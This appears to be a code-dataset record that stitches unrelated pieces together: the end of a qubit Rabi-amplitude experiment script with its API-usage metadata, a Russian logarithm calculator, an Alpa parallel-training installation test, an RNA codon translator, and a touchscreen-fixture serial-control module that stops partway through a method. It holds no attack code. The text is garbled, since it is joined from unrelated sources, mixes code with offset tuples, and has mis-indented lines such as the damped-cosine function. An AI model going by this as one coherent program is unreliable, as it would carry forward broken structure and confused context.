        print("Tau pulse amplitude: {} +- {} FS".format(period, period_err))
        print("Pi pulse amplitude: {} +- {} FS".format(pi_amp, period_err / 2))
        print("Pi/2 pulse amplitude: {} +- {} FS".format(pi_2_amp, period_err / 4))
        if all_plots:
            fig2, ax2 = plt.subplots(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)
            ax21, ax22, ax23, ax24 = ax2
            ax21.plot(self.control_amp_arr, np.abs(data))
            ax22.plot(self.control_amp_arr, np.angle(data))
            ax23.plot(self.control_amp_arr, np.real(data))
            ax23.plot(self.control_amp_arr, _func(self.control_amp_arr, *popt_x), '--')
            ax24.plot(self.control_amp_arr, np.imag(data))
            ax21.set_ylabel("Amplitude [FS]")
            ax22.set_ylabel("Phase [rad]")
            ax23.set_ylabel("I [FS]")
            ax24.set_ylabel("Q [FS]")
            ax2[-1].set_xlabel("Pulse amplitude [FS]")
            fig2.show()
            ret_fig.append(fig2)
        # Pick an SI prefix for the y axis based on the data magnitude.
        data_max = np.abs(data).max()
        unit = ""
        mult = 1.0
        if data_max < 1e-6:
            unit = "n"
            mult = 1e9
        elif data_max < 1e-3:
            unit = "μ"
            mult = 1e6
        elif data_max < 1e0:
            unit = "m"
            mult = 1e3
        fig3, ax3 = plt.subplots(tight_layout=True)
        ax3.plot(self.control_amp_arr, mult * np.real(data), '.')
        ax3.plot(self.control_amp_arr, mult * _func(self.control_amp_arr, *popt_x), '--')
        ax3.set_ylabel(f"I quadrature [{unit:s}FS]")
        ax3.set_xlabel("Pulse amplitude [FS]")
        fig3.show()
        ret_fig.append(fig3)
        return ret_fig
def _func(t, offset, amplitude, T2, period, phase):
frequency = 1 / period
return offset + amplitude * np.exp(-t / T2) * np.cos(math.tau * frequency * t + phase)
def _fit_period(x: list[float], y: list[float]) -> tuple[list[float], list[float]]:
    """Fit the damped cosine ``_func`` to y(x); return (popt, perr).

    The initial guess is derived from the data: offset and amplitude from the
    peak-to-peak range, T2 from half the x span, the period from the dominant
    (non-DC) FFT frequency, and the phase from the first sample.  ``perr``
    holds the one-sigma parameter errors from the fit covariance.

    Cleanup: removed a dead re-unpacking of ``popt`` after the return value
    was already fixed, and the commented-out least_squares alternative.
    """
    from scipy.optimize import curve_fit
    pkpk = np.max(y) - np.min(y)
    offset = np.min(y) + pkpk / 2
    amplitude = 0.5 * pkpk
    T2 = 0.5 * (np.max(x) - np.min(x))
    freqs = np.fft.rfftfreq(len(x), x[1] - x[0])
    fft = np.fft.rfft(y)
    # Skip the DC bin when picking the dominant frequency.
    frequency = freqs[1 + np.argmax(np.abs(fft[1:]))]
    period = 1 / frequency
    # Clamp the normalized first sample into [-1, 1] before arccos.
    first = (y[0] - offset) / amplitude
    if first > 1.:
        first = 1.
    elif first < -1.:
        first = -1.
    phase = np.arccos(first)
    p0 = (
        offset,
        amplitude,
        T2,
        period,
        phase,
    )
    popt, pcov = curve_fit(_func, x, y, p0=p0)
    perr = np.sqrt(np.diag(pcov))
    return popt, perr
if __name__ == "__main__":
    # Experiment configuration: pick the qubit, whether the JPA is pumped,
    # and whether the coupler shifts the transition frequencies.
    WHICH_QUBIT = 2  # 1 (higher resonator) or 2 (lower resonator)
    USE_JPA = False
    WITH_COUPLER = False
    # Presto's IP address or hostname
    # ADDRESS = "172.16.17.32"
    # PORT = 42874
    ADDRESS = "127.0.0.1"
    PORT = 7878
    EXT_REF_CLK = False  # set to True to lock to an external reference clock
    jpa_bias_port = 1
    # Per-qubit frequencies, ports, and JPA settings.
    if WHICH_QUBIT == 1:
        if WITH_COUPLER:
            readout_freq = 6.167_009 * 1e9  # Hz, frequency for resonator readout
            control_freq = 3.556_520 * 1e9  # Hz
        else:
            readout_freq = 6.166_600 * 1e9  # Hz, frequency for resonator readout
            control_freq = 3.557_866 * 1e9  # Hz
        control_port = 3
        jpa_pump_freq = 2 * 6.169e9  # Hz
        jpa_pump_pwr = 11  # lmx units
        jpa_bias = +0.437  # V
    elif WHICH_QUBIT == 2:
        if WITH_COUPLER:
            readout_freq = 6.029_130 * 1e9  # Hz, frequency for resonator readout
            control_freq = 4.093_042 * 1e9  # Hz
        else:
            readout_freq = 6.028_450 * 1e9  # Hz, frequency for resonator readout
            control_freq = 4.093_372 * 1e9  # Hz
        control_port = 4
        jpa_pump_freq = 2 * 6.031e9  # Hz
        jpa_pump_pwr = 9  # lmx units
        jpa_bias = +0.449  # V
    else:
        raise ValueError
    # cavity drive: readout
    readout_amp = 0.4  # FS
    readout_duration = 2e-6  # s, duration of the readout pulse
    readout_port = 1
    # qubit drive: control
    control_duration = 20e-9  # s, duration of the control pulse
    # cavity readout: sample
    sample_duration = 4 * 1e-6  # s, duration of the sampling window
    sample_port = 1
    # Rabi experiment
    num_averages = 1_000
    rabi_n = 128  # number of steps when changing duration of control pulse
    control_amp_arr = np.linspace(0.0, 1.0, rabi_n)  # FS, amplitudes for control pulse
    wait_delay = 200e-6  # s, delay between repetitions to allow the qubit to decay
    readout_sample_delay = 290 * 1e-9  # s, delay between readout pulse and sample window to account for latency
    jpa_params = {
        'jpa_bias': jpa_bias,
        'jpa_bias_port': jpa_bias_port,
        'jpa_pump_freq': jpa_pump_freq,
        'jpa_pump_pwr': jpa_pump_pwr,
    } if USE_JPA else None
    rabi = RabiAmp(
        readout_freq,
        control_freq,
        readout_port,
        control_port,
        readout_amp,
        readout_duration,
        control_duration,
        sample_duration,
        sample_port,
        control_amp_arr,
        wait_delay,
        readout_sample_delay,
        num_averages,
        jpa_params,
    )
    rabi.run(ADDRESS, PORT, EXT_REF_CLK)
|
[
"presto.pulsed.Pulsed",
"numpy.fft.rfft",
"presto.utils.rotate_opt",
"numpy.abs",
"numpy.angle",
"numpy.imag",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"numpy.diag",
"os.path.join",
"presto.utils.sin2",
"numpy.max",
"numpy.linspace",
"numpy.real",
"mla_server.set_dc_bias",
"numpy.arccos",
"matplotlib.pyplot.subplots",
"time.localtime",
"presto.utils.get_sourcecode",
"h5py.File",
"os.path.realpath",
"h5py.string_dtype",
"scipy.optimize.curve_fit",
"time.sleep",
"numpy.min",
"numpy.cos",
"numpy.isscalar",
"os.path.splitext",
"ast.literal_eval",
"os.path.split"
] |
[((14644, 14658), 'numpy.fft.rfft', 'np.fft.rfft', (['y'], {}), '(y)\n', (14655, 14658), True, 'import numpy as np\n'), ((14872, 14888), 'numpy.arccos', 'np.arccos', (['first'], {}), '(first)\n', (14881, 14888), True, 'import numpy as np\n'), ((14994, 15023), 'scipy.optimize.curve_fit', 'curve_fit', (['_func', 'x', 'y'], {'p0': 'p0'}), '(_func, x, y, p0=p0)\n', (15003, 15023), False, 'from scipy.optimize import curve_fit\n'), ((17298, 17327), 'numpy.linspace', 'np.linspace', (['(0.0)', '(1.0)', 'rabi_n'], {}), '(0.0, 1.0, rabi_n)\n', (17309, 17327), True, 'import numpy as np\n'), ((7958, 7982), 'presto.utils.get_sourcecode', 'get_sourcecode', (['__file__'], {}), '(__file__)\n', (7972, 7982), False, 'from presto.utils import get_sourcecode, sin2\n'), ((11440, 11468), 'numpy.arange', 'np.arange', (['idx_low', 'idx_high'], {}), '(idx_low, idx_high)\n', (11449, 11468), True, 'import numpy as np\n'), ((12128, 12171), 'numpy.mean', 'np.mean', (['self.store_arr[:, 0, idx]'], {'axis': '(-1)'}), '(self.store_arr[:, 0, idx], axis=-1)\n', (12135, 12171), True, 'import numpy as np\n'), ((12187, 12207), 'presto.utils.rotate_opt', 'rotate_opt', (['resp_arr'], {}), '(resp_arr)\n', (12197, 12207), False, 'from presto.utils import rotate_opt\n'), ((13742, 13773), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'tight_layout': '(True)'}), '(tight_layout=True)\n', (13754, 13773), True, 'import matplotlib.pyplot as plt\n'), ((14463, 14472), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (14469, 14472), True, 'import numpy as np\n'), ((14475, 14484), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14481, 14484), True, 'import numpy as np\n'), ((14498, 14507), 'numpy.min', 'np.min', (['y'], {}), '(y)\n', (14504, 14507), True, 'import numpy as np\n'), ((15079, 15092), 'numpy.diag', 'np.diag', (['pcov'], {}), '(pcov)\n', (15086, 15092), True, 'import numpy as np\n'), ((1850, 2153), 'presto.pulsed.Pulsed', 'pulsed.Pulsed', ([], {'address': 'presto_address', 'port': 'presto_port', 
'ext_ref_clk': 'ext_ref_clk', 'adc_mode': 'AdcMode.Mixed', 'adc_fsample': 'AdcFSample.G2', 'dac_mode': '[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.Mixed02]', 'dac_fsample': '[DacFSample.G10, DacFSample.G6, DacFSample.G6, DacFSample.G6]'}), '(address=presto_address, port=presto_port, ext_ref_clk=\n ext_ref_clk, adc_mode=AdcMode.Mixed, adc_fsample=AdcFSample.G2,\n dac_mode=[DacMode.Mixed42, DacMode.Mixed02, DacMode.Mixed02, DacMode.\n Mixed02], dac_fsample=[DacFSample.G10, DacFSample.G6, DacFSample.G6,\n DacFSample.G6])\n', (1863, 2153), False, 'from presto import pulsed\n'), ((5171, 5187), 'presto.utils.sin2', 'sin2', (['control_ns'], {}), '(control_ns)\n', (5175, 5187), False, 'from presto.utils import get_sourcecode, sin2\n'), ((7358, 7384), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7374, 7384), False, 'import os\n'), ((7459, 7485), 'os.path.split', 'os.path.split', (['script_path'], {}), '(script_path)\n', (7472, 7485), False, 'import os\n'), ((7790, 7838), 'os.path.join', 'os.path.join', (['current_dir', '"""data"""', 'save_basename'], {}), "(current_dir, 'data', save_basename)\n", (7802, 7838), False, 'import os\n'), ((7903, 7934), 'os.path.realpath', 'os.path.realpath', (['save_filename'], {}), '(save_filename)\n', (7919, 7934), False, 'import os\n'), ((8059, 8084), 'h5py.File', 'h5py.File', (['save_path', '"""w"""'], {}), "(save_path, 'w')\n", (8068, 8084), False, 'import h5py\n'), ((8110, 8145), 'h5py.string_dtype', 'h5py.string_dtype', ([], {'encoding': '"""utf-8"""'}), "(encoding='utf-8')\n", (8127, 8145), False, 'import h5py\n'), ((9028, 9057), 'h5py.File', 'h5py.File', (['load_filename', '"""r"""'], {}), "(load_filename, 'r')\n", (9037, 9057), False, 'import h5py\n'), ((11340, 11366), 'numpy.abs', 'np.abs', (['(self.t_arr - t_low)'], {}), '(self.t_arr - t_low)\n', (11346, 11366), True, 'import numpy as np\n'), ((11397, 11424), 'numpy.abs', 'np.abs', (['(self.t_arr - t_high)'], {}), '(self.t_arr - 
t_high)\n', (11403, 11424), True, 'import numpy as np\n'), ((11613, 11663), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(2)', '(1)'], {'sharex': '(True)', 'tight_layout': '(True)'}), '(2, 1, sharex=True, tight_layout=True)\n', (11625, 11663), True, 'import matplotlib.pyplot as plt\n'), ((12287, 12300), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (12294, 12300), True, 'import numpy as np\n'), ((12706, 12776), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(4)', '(1)'], {'sharex': '(True)', 'figsize': '(6.4, 6.4)', 'tight_layout': '(True)'}), '(4, 1, sharex=True, figsize=(6.4, 6.4), tight_layout=True)\n', (12718, 12776), True, 'import matplotlib.pyplot as plt\n'), ((14234, 14274), 'numpy.cos', 'np.cos', (['(math.tau * frequency * t + phase)'], {}), '(math.tau * frequency * t + phase)\n', (14240, 14274), True, 'import numpy as np\n'), ((14562, 14571), 'numpy.max', 'np.max', (['x'], {}), '(x)\n', (14568, 14571), True, 'import numpy as np\n'), ((14574, 14583), 'numpy.min', 'np.min', (['x'], {}), '(x)\n', (14580, 14583), True, 'import numpy as np\n'), ((3169, 3243), 'mla_server.set_dc_bias', 'set_dc_bias', (["self.jpa_params['jpa_bias_port']", "self.jpa_params['jpa_bias']"], {}), "(self.jpa_params['jpa_bias_port'], self.jpa_params['jpa_bias'])\n", (3180, 3243), False, 'from mla_server import set_dc_bias\n'), ((3260, 3275), 'time.sleep', 'time.sleep', (['(1.0)'], {}), '(1.0)\n', (3270, 3275), False, 'import time\n'), ((6996, 7046), 'mla_server.set_dc_bias', 'set_dc_bias', (["self.jpa_params['jpa_bias_port']", '(0.0)'], {}), "(self.jpa_params['jpa_bias_port'], 0.0)\n", (7007, 7046), False, 'from mla_server import set_dc_bias\n'), ((7516, 7549), 'os.path.splitext', 'os.path.splitext', (['script_basename'], {}), '(script_basename)\n', (7532, 7549), False, 'import os\n'), ((7634, 7650), 'time.localtime', 'time.localtime', ([], {}), '()\n', (7648, 7650), False, 'import time\n'), ((10298, 10339), 'ast.literal_eval', 'ast.literal_eval', 
(["h5f.attrs['jpa_params']"], {}), "(h5f.attrs['jpa_params'])\n", (10314, 10339), False, 'import ast\n'), ((11879, 11910), 'numpy.abs', 'np.abs', (['self.store_arr[0, 0, :]'], {}), '(self.store_arr[0, 0, :])\n', (11885, 11910), True, 'import numpy as np\n'), ((11952, 11985), 'numpy.angle', 'np.angle', (['self.store_arr[0, 0, :]'], {}), '(self.store_arr[0, 0, :])\n', (11960, 11985), True, 'import numpy as np\n'), ((12862, 12874), 'numpy.abs', 'np.abs', (['data'], {}), '(data)\n', (12868, 12874), True, 'import numpy as np\n'), ((12920, 12934), 'numpy.angle', 'np.angle', (['data'], {}), '(data)\n', (12928, 12934), True, 'import numpy as np\n'), ((12980, 12993), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (12987, 12993), True, 'import numpy as np\n'), ((13127, 13140), 'numpy.imag', 'np.imag', (['data'], {}), '(data)\n', (13134, 13140), True, 'import numpy as np\n'), ((13440, 13452), 'numpy.abs', 'np.abs', (['data'], {}), '(data)\n', (13446, 13452), True, 'import numpy as np\n'), ((13820, 13833), 'numpy.real', 'np.real', (['data'], {}), '(data)\n', (13827, 13833), True, 'import numpy as np\n'), ((14216, 14231), 'numpy.exp', 'np.exp', (['(-t / T2)'], {}), '(-t / T2)\n', (14222, 14231), True, 'import numpy as np\n'), ((14695, 14710), 'numpy.abs', 'np.abs', (['fft[1:]'], {}), '(fft[1:])\n', (14701, 14710), True, 'import numpy as np\n'), ((8683, 8720), 'numpy.isscalar', 'np.isscalar', (['self.__dict__[attribute]'], {}), '(self.__dict__[attribute])\n', (8694, 8720), True, 'import numpy as np\n')]
|
import math
print('Вас приветствует логарифмер.')
print('Выберите тип (1 - Двоичный, 2 - Стандартный десятичный)')
a = int(input())
b = float(input('Введите число: '))
if a == 1 :
print(math.log(b, 2))
elif a == 2 :
print(math.log(b))
else:
print('Ошибка!')
|
[
"math.log"
] |
[((196, 210), 'math.log', 'math.log', (['b', '(2)'], {}), '(b, 2)\n', (204, 210), False, 'import math\n'), ((238, 249), 'math.log', 'math.log', (['b'], {}), '(b)\n', (246, 249), False, 'import math\n')]
|
"""Some basic tests to test installation."""
import os
import unittest
from flax import linen as nn
from flax.training.train_state import TrainState
import jax
import jax.numpy as jnp
import numpy as np
import optax
import ray
from alpa import (init, parallelize, grad, ShardParallel,
automatic_layer_construction, PipeshardParallel)
from alpa.device_mesh import get_global_cluster
from alpa.testing import assert_allclose
def create_train_state_and_batch(batch_size, hidden_size):
class Model(nn.Module):
@nn.compact
def __call__(self, x):
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
x = nn.Dense(hidden_size, use_bias=True)(x)
return x
rngkey = jax.random.PRNGKey(0)
batch = {
"x":
jax.random.normal(rngkey, (batch_size, hidden_size),
dtype=jnp.float32),
"y":
jax.random.normal(rngkey, (batch_size, hidden_size),
dtype=jnp.float32)
}
# Init model and optimizer
model = Model()
rngkey = jax.random.PRNGKey(0)
params = model.init(rngkey, batch["x"])
tx = optax.sgd(learning_rate=1e-3)
state = TrainState.create(apply_fn=model.apply, params=params, tx=tx)
return state, batch
class InstallationTest(unittest.TestCase):
def setUp(self):
os.environ["XLA_PYTHON_CLIENT_ALLOCATOR"] = "platform"
def test_1_shard_parallel(self):
state, batch = create_train_state_and_batch(256, 256)
def train_step(state, batch):
def loss_func(params):
out = state.apply_fn(params, batch['x'])
return jnp.mean((out - batch['y'])**2)
grads = grad(loss_func)(state.params)
new_state = state.apply_gradients(grads=grads)
return new_state
# Serial execution
expected_state = train_step(state, batch)
# Parallel execution
p_train_step = parallelize(train_step,
method=ShardParallel(num_micro_batches=2))
actual_state = p_train_step(state, batch)
# Check results
assert_allclose(expected_state.params, actual_state.params)
def test_2_pipeline_parallel(self):
init(cluster="ray")
layer_num = min(get_global_cluster().num_devices, 2)
state, batch = create_train_state_and_batch(256, 256)
def train_step(state, batch):
@automatic_layer_construction(layer_num=layer_num)
def loss_func(params):
out = state.apply_fn(params, batch['x'])
return jnp.mean((out - batch['y'])**2)
grads = grad(loss_func)(state.params)
new_state = state.apply_gradients(grads=grads)
return new_state
# Serial execution
expected_state = train_step(state, batch)
# Parallel execution
p_train_step = parallelize(
train_step, method=PipeshardParallel(num_micro_batches=2))
actual_state = p_train_step(state, batch)
# Check results
assert_allclose(expected_state.params, actual_state.params)
def suite():
suite = unittest.TestSuite()
suite.addTest(InstallationTest("test_1_shard_parallel"))
suite.addTest(InstallationTest("test_2_pipeline_parallel"))
return suite
if __name__ == "__main__":
runner = unittest.TextTestRunner()
runner.run(suite())
|
[
"unittest.TextTestRunner",
"unittest.TestSuite",
"jax.random.normal",
"flax.linen.Dense",
"alpa.ShardParallel",
"flax.training.train_state.TrainState.create",
"alpa.automatic_layer_construction",
"jax.random.PRNGKey",
"alpa.grad",
"alpa.init",
"optax.sgd",
"alpa.testing.assert_allclose",
"alpa.device_mesh.get_global_cluster",
"alpa.PipeshardParallel",
"jax.numpy.mean"
] |
[((956, 977), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (974, 977), False, 'import jax\n'), ((1318, 1339), 'jax.random.PRNGKey', 'jax.random.PRNGKey', (['(0)'], {}), '(0)\n', (1336, 1339), False, 'import jax\n'), ((1393, 1423), 'optax.sgd', 'optax.sgd', ([], {'learning_rate': '(0.001)'}), '(learning_rate=0.001)\n', (1402, 1423), False, 'import optax\n'), ((1435, 1496), 'flax.training.train_state.TrainState.create', 'TrainState.create', ([], {'apply_fn': 'model.apply', 'params': 'params', 'tx': 'tx'}), '(apply_fn=model.apply, params=params, tx=tx)\n', (1452, 1496), False, 'from flax.training.train_state import TrainState\n'), ((3421, 3441), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (3439, 3441), False, 'import unittest\n'), ((3626, 3651), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {}), '()\n', (3649, 3651), False, 'import unittest\n'), ((1017, 1088), 'jax.random.normal', 'jax.random.normal', (['rngkey', '(batch_size, hidden_size)'], {'dtype': 'jnp.float32'}), '(rngkey, (batch_size, hidden_size), dtype=jnp.float32)\n', (1034, 1088), False, 'import jax\n'), ((1145, 1216), 'jax.random.normal', 'jax.random.normal', (['rngkey', '(batch_size, hidden_size)'], {'dtype': 'jnp.float32'}), '(rngkey, (batch_size, hidden_size), dtype=jnp.float32)\n', (1162, 1216), False, 'import jax\n'), ((2394, 2453), 'alpa.testing.assert_allclose', 'assert_allclose', (['expected_state.params', 'actual_state.params'], {}), '(expected_state.params, actual_state.params)\n', (2409, 2453), False, 'from alpa.testing import assert_allclose\n'), ((2503, 2522), 'alpa.init', 'init', ([], {'cluster': '"""ray"""'}), "(cluster='ray')\n", (2507, 2522), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((3334, 3393), 'alpa.testing.assert_allclose', 'assert_allclose', (['expected_state.params', 'actual_state.params'], {}), '(expected_state.params, actual_state.params)\n', (3349, 
3393), False, 'from alpa.testing import assert_allclose\n'), ((2700, 2749), 'alpa.automatic_layer_construction', 'automatic_layer_construction', ([], {'layer_num': 'layer_num'}), '(layer_num=layer_num)\n', (2728, 2749), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((601, 637), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (609, 637), True, 'from flax import linen as nn\n'), ((657, 693), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (665, 693), True, 'from flax import linen as nn\n'), ((713, 749), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (721, 749), True, 'from flax import linen as nn\n'), ((769, 805), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (777, 805), True, 'from flax import linen as nn\n'), ((825, 861), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (833, 861), True, 'from flax import linen as nn\n'), ((881, 917), 'flax.linen.Dense', 'nn.Dense', (['hidden_size'], {'use_bias': '(True)'}), '(hidden_size, use_bias=True)\n', (889, 917), True, 'from flax import linen as nn\n'), ((1907, 1940), 'jax.numpy.mean', 'jnp.mean', (["((out - batch['y']) ** 2)"], {}), "((out - batch['y']) ** 2)\n", (1915, 1940), True, 'import jax.numpy as jnp\n'), ((1960, 1975), 'alpa.grad', 'grad', (['loss_func'], {}), '(loss_func)\n', (1964, 1975), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((2275, 2309), 'alpa.ShardParallel', 'ShardParallel', ([], {'num_micro_batches': '(2)'}), '(num_micro_batches=2)\n', (2288, 2309), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, 
PipeshardParallel\n'), ((2548, 2568), 'alpa.device_mesh.get_global_cluster', 'get_global_cluster', ([], {}), '()\n', (2566, 2568), False, 'from alpa.device_mesh import get_global_cluster\n'), ((2865, 2898), 'jax.numpy.mean', 'jnp.mean', (["((out - batch['y']) ** 2)"], {}), "((out - batch['y']) ** 2)\n", (2873, 2898), True, 'import jax.numpy as jnp\n'), ((2918, 2933), 'alpa.grad', 'grad', (['loss_func'], {}), '(loss_func)\n', (2922, 2933), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n'), ((3211, 3249), 'alpa.PipeshardParallel', 'PipeshardParallel', ([], {'num_micro_batches': '(2)'}), '(num_micro_batches=2)\n', (3228, 3249), False, 'from alpa import init, parallelize, grad, ShardParallel, automatic_layer_construction, PipeshardParallel\n')]
|
from textwrap import wrap
def proteins(strand):
# textwrap.wrap(s, i) creates a list of elements from s with a max width of i
codons = wrap(strand, 3)
codons_to_protein = {
'AUG': 'Methionine',
'UUU': 'Phenylalanine',
'UUC': 'Phenylalanine',
'UUA': 'Leucine',
'UUG': 'Leucine',
'UCU': 'Serine',
'UCC': 'Serine',
'UCA': 'Serine',
'UCG': 'Serine',
'UAU': 'Tyrosine',
'UAC': 'Tyrosine',
'UGU': 'Cysteine',
'UGC': 'Cysteine',
'UGG': 'Tryptophan',
'UAA': 'STOP',
'UAG': 'STOP',
'UGA': 'STOP'
}
RNA = []
for i in codons:
if codons_to_protein[i] == 'STOP':
break
else:
RNA.append(codons_to_protein[i])
return RNA
|
[
"textwrap.wrap"
] |
[((149, 164), 'textwrap.wrap', 'wrap', (['strand', '(3)'], {}), '(strand, 3)\n', (153, 164), False, 'from textwrap import wrap\n')]
|
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import threading
import time
from cros.factory.test import event
from cros.factory.test.i18n import _
from cros.factory.test import session
from cros.factory.test.utils import serial_utils
# Define the driver name and the interface protocols to find the arduino ports.
# NATIVE_USB_PORT: used to monitor the internal state of test fixture.
# PROGRAMMING_PORT: used to upload the firmware from host to the arduino and
# issue calibration commands to control the test fixture.
NATIVE_USB_PORT = 0
PROGRAMMING_PORT = 1
ARDUINO_DRIVER = 'cdc_acm'
interface_protocol_dict = {NATIVE_USB_PORT: '00', PROGRAMMING_PORT: '01'}
ArduinoCommand = collections.namedtuple(
'ArduinoCommand', ['DOWN', 'UP', 'STATE', 'RESET'])
COMMAND = ArduinoCommand('d', 'u', 's', 'r')
ArduinoState = collections.namedtuple(
'ArduinoState', ['INIT', 'STOP_DOWN', 'STOP_UP', 'GOING_DOWN', 'GOING_UP',
'EMERGENCY_STOP'])
STATE = ArduinoState('i', 'D', 'U', 'd', 'u', 'e')
class FixtureException(Exception):
"""A dummy exception class for FixtureSerialDevice."""
class FixutreNativeUSB(serial_utils.SerialDevice):
"""A native usb port used to monitor the internal state of the fixture."""
def __init__(self, driver=ARDUINO_DRIVER,
interface_protocol=interface_protocol_dict[NATIVE_USB_PORT],
timeout=86400):
super(FixutreNativeUSB, self).__init__()
self.driver = driver
self.interface_protocol = interface_protocol
self.timeout = timeout
self.port = self._GetPort()
self._Connect(self.port)
self.state_string = None
self.last_state_string = None
# The ordering of the state names should match that in
# touchscreen_calibration.ino
self.state_name_dict = [
'state',
'jumper',
'button debug',
'sensor extreme up',
'sensor up',
'sensor down',
'sensor safety',
'motor direction',
'motor enabled',
'motor locked',
'motor duty cycle',
'pwm frequency',
'count',
]
def _GetPort(self):
return serial_utils.FindTtyByDriver(self.driver, self.interface_protocol)
def _Connect(self, port):
try:
self.Connect(port=port, timeout=self.timeout)
msg = 'Connect to native USB port "%s" for monitoring internal state.'
session.console.info(msg, port)
except Exception:
msg = 'FixtureNativeUSB: failed to connect to native usb port: %s'
session.console.warn(msg, port)
def _CheckReconnection(self):
"""Reconnect the native usb port if it has been refreshed."""
curr_port = self._GetPort()
if curr_port != self.port:
self.Disconnect()
self._Connect(curr_port)
self.port = curr_port
session.console.info('Reconnect to new port: %s', curr_port)
def GetState(self):
"""Get the fixture state from the native usb port.
The complete state_string looks like: <i1001000000.6000.0>
Its format is defined in self.state_name_dict in __init__() above.
The first character describes the main state.
This call is blocked until a complete fixture state has been received.
Call this method with a new thread if needed.
"""
self._CheckReconnection()
reply = []
while True:
ch = self.Receive()
reply.append(ch)
if ch == '>':
self.last_state_string = self.state_string
self.state_string = ''.join(reply)
return self.state_string
def QueryFixtureState(self):
"""Query fixture internal state."""
self._CheckReconnection()
self.Send('s')
def _ExtractStateList(self, state_string):
if state_string:
state, pwm_freq, count = state_string.strip().strip('<>').split('.')
state_list = list(state)
state_list.extend([pwm_freq, count])
else:
state_list = []
return state_list
def DiffState(self):
"""Get the difference of between this state and the last state."""
old_state_list = self._ExtractStateList(self.last_state_string)
new_state_list = self._ExtractStateList(self.state_string)
return [(self.state_name_dict[i], new_state_list[i])
for i in range(len(new_state_list))
if old_state_list == [] or new_state_list[i] != old_state_list[i]]
def CompleteState(self):
"""Get the complete state snap shot."""
state_list = self._ExtractStateList(self.state_string)
return [(self.state_name_dict[i], state_list[i])
for i in range(len(state_list))]
class BaseFixture(serial_utils.SerialDevice):
"""A base fixture class."""
def __init__(self, state=None):
super(BaseFixture, self).__init__()
self.state = state
self.native_usb = None
class FakeFixture(BaseFixture):
"""A fake fixture class used for development purpose only."""
TIMEOUT = 10
def __init__(self, ui, state=None):
super(FakeFixture, self).__init__(state)
self.ui = ui
self.final_calibration_lock = threading.Event()
def QueryState(self):
"""Queries the state of the arduino board."""
return self.state
def IsStateUp(self):
"""Checks if the fixture is in the INIT or STOP_UP state."""
return (self.state in [STATE.INIT, STATE.STOP_UP])
def IsEmergencyStop(self):
"""Checks if the fixture is in the EMERGENCY_STOP state."""
return self.state == STATE.EMERGENCY_STOP
def DriveProbeDown(self):
"""Drives the probe to the 'down' position."""
session.console.info('Drive Probe Down....')
self.ui.Alert(_('Pull the lever down.'))
def DriveProbeUp(self):
"""Drives the probe to the 'up' position."""
session.console.info('Drive Probe Up....')
self.ui.Alert(_('Pull the lever up.'))
self.final_calibration_lock.wait(self.TIMEOUT)
self.ui.PostEvent(event.Event(event.Event.Type.TEST_UI_EVENT,
subtype='FinishTest'))
def DriveProbeUpDone(self):
"""Notify that the DriveProbeUp has been done."""
self.final_calibration_lock.set()
class FixtureSerialDevice(BaseFixture):
"""A serial device to control touchscreen fixture."""
def __init__(self, driver=ARDUINO_DRIVER,
interface_protocol=interface_protocol_dict[PROGRAMMING_PORT],
timeout=20):
super(FixtureSerialDevice, self).__init__()
try:
port = serial_utils.FindTtyByDriver(driver, interface_protocol)
self.Connect(port=port, timeout=timeout)
msg = 'Connect to programming port "%s" for issuing commands.'
session.console.info(msg, port)
session.console.info('Wait up to %d seconds for arduino initialization.',
timeout)
except Exception:
raise FixtureException('Failed to connect the test fixture.')
self.AssertStateWithTimeout([STATE.INIT, STATE.STOP_UP,
STATE.EMERGENCY_STOP], timeout)
# The 2nd-generation tst fixture has a native usb port.
self.native_usb = FixutreNativeUSB()
if not self.native_usb:
raise FixtureException('Fail to connect the native usb port.')
def QueryState(self):
"""Queries the state of the arduino board."""
try:
self.state = self.SendReceive(COMMAND.STATE)
except Exception:
raise FixtureException('QueryState failed.')
return self.state
def IsStateUp(self):
"""Checks if the fixture is in the INIT or STOP_UP state."""
return (self.QueryState() in [STATE.INIT, STATE.STOP_UP])
def IsEmergencyStop(self):
"""Checks if the fixture is in the EMERGENCY_STOP state."""
return self.QueryState() == STATE.EMERGENCY_STOP
def AssertStateWithTimeout(self, expected_states, timeout):
"""Assert the state with timeout."""
while True:
result, state = self._AssertState(expected_states)
if result is True:
session.console.info('state: %s (expected)', state)
return
